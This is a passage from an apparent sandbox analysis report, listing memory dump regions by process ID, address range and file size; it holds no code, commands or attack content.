                        • memory/1356-125-0x00000000008B0000-0x00000000008B8000-memory.dmp

                          Filesize

                          32KB

                        • memory/1356-84-0x0000000000000000-mapping.dmp

                        • memory/1356-107-0x00000000008D0000-0x00000000008F2000-memory.dmp

                          Filesize

                          136KB

                        • memory/1432-171-0x0000000000000000-mapping.dmp

                        • memory/1508-178-0x0000000000000000-mapping.dmp

                        • memory/1532-83-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1532-90-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1532-58-0x0000000000000000-mapping.dmp

                        • memory/1532-76-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1532-80-0x0000000074A60000-0x0000000074B70000-memory.dmp

                          Filesize

                          1.1MB

                        • memory/1532-116-0x0000000074A60000-0x0000000074B70000-memory.dmp

                          Filesize

                          1.1MB

                        • memory/1532-115-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1532-85-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1532-88-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1532-102-0x0000000003F80000-0x0000000004AFC000-memory.dmp

                          Filesize

                          11.5MB

                        • memory/1532-87-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1532-101-0x0000000010000000-0x000000001006A000-memory.dmp

                          Filesize

                          424KB

                        • memory/1532-96-0x0000000010000000-0x000000001006A000-memory.dmp

                          Filesize

                          424KB

                        • memory/1532-89-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1532-93-0x0000000000890000-0x0000000000BD9000-memory.dmp

                          Filesize

                          3.3MB

                        • memory/1560-180-0x0000000000000000-mapping.dmp

                        • memory/1612-153-0x0000000000000000-mapping.dmp

                        • memory/1620-155-0x0000000000000000-mapping.dmp

                        • memory/1640-148-0x0000000000000000-mapping.dmp

                        • memory/1680-145-0x0000000000000000-mapping.dmp

                        • memory/1704-152-0x0000000000000000-mapping.dmp

                        • memory/1728-174-0x0000000000000000-mapping.dmp

                        • memory/1760-176-0x0000000000000000-mapping.dmp

                        • memory/1764-154-0x0000000000000000-mapping.dmp

                        • memory/1776-159-0x0000000000000000-mapping.dmp

                        • memory/1776-162-0x000000013FF80000-0x00000001403A8000-memory.dmp

                          Filesize

                          4.2MB

                        • memory/1780-164-0x0000000000000000-mapping.dmp

                        • memory/1780-166-0x000007FEEB3E0000-0x000007FEEBE03000-memory.dmp

                          Filesize

                          10.1MB

                        • memory/1780-167-0x000007FEEA880000-0x000007FEEB3DD000-memory.dmp

                          Filesize

                          11.4MB

                        • memory/1780-168-0x00000000010F4000-0x00000000010F7000-memory.dmp

                          Filesize

                          12KB

                        • memory/1780-169-0x00000000010FB000-0x000000000111A000-memory.dmp

                          Filesize

                          124KB

                        • memory/1804-109-0x0000000000C60000-0x0000000000DE4000-memory.dmp

                          Filesize

                          1.5MB

                        • memory/1804-75-0x0000000000000000-mapping.dmp

                        • memory/1836-151-0x0000000000000000-mapping.dmp

                        • memory/1852-172-0x0000000000000000-mapping.dmp

                        • memory/1856-173-0x0000000000000000-mapping.dmp

                        • memory/1856-136-0x0000000000000000-mapping.dmp

                        • memory/1880-134-0x0000000000000000-mapping.dmp

                        • memory/1956-140-0x00000000736B0000-0x0000000073C5B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/1956-111-0x00000000736B0000-0x0000000073C5B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/1956-123-0x00000000736B0000-0x0000000073C5B000-memory.dmp

                          Filesize

                          5.7MB

                        • memory/1956-55-0x0000000000000000-mapping.dmp

                        • memory/1960-175-0x0000000000000000-mapping.dmp

                        • memory/1992-149-0x0000000000000000-mapping.dmp